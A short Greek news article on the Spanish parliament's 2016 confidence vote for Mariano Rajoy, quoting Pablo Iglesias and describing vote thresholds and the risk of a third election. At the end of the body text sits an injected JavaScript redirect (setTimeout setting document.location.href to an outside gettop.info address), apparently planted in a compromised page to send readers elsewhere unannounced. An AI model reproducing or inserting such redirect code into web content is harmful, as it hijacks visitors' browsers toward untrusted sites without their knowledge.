Ισπανία: Προγραμματικές δηλώσεις με… άρωμα Ελλάδας

0
8

 

«Στην Ελλάδα, η κεντροδεξιά παραποιούσε στοιχεία, όπως και ο υπουργός οικονομίας του Μαριάνο Ραχόι», δήλωσε ο ηγέτης των Podemos, Πάμπλο Ιγκλέσιας, στο ισπανικό κοινοβούλιο, όπου ολοκληρώνεται σε υψηλούς τόνους, η διαδικασία των προγραμματικών δηλώσεων για παροχή ψήφου εμπιστοσύνης στον Μαριάνο Ραχόι, ώστε να σχηματιστεί κυβέρνηση και να μπει τέλος στην πολιτική αστάθεια που ζει εδώ και μήνες η χώρα.

Η ψηφοφορία απαιτεί την απόλυτη πλειοψηφία των 176 ψήφων, αλλά προβλέπεται και δεύτερη «ευκαιρία» για τον ηγέτη του Λαϊκού Κόμματος Μαριάνο Ραχόι, στις 2 Σεπτεμβρίου οπότε και απαιτείται απλή πλειοψηφία.

Οι πολιτικοί ηγέτες έχουν διορία μέχρι τις 31 Οκτωβρίου για να βρεθεί διέξοδος με διακομματική συνεργασία, αλλιώς οι Ισπανοί θα κληθούν για τρίτη φορά στις κάλπες.

Μάλιστα θεωρείται πιθανό αυτό να συμβεί ανήμερα των Χριστουγέννων, εάν, λόγω νέου αδιεξόδου, ο Βασιλιάς της χώρας διαλύσει το Κοινοβούλιο και προκηρύξει νέες εκλογές. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here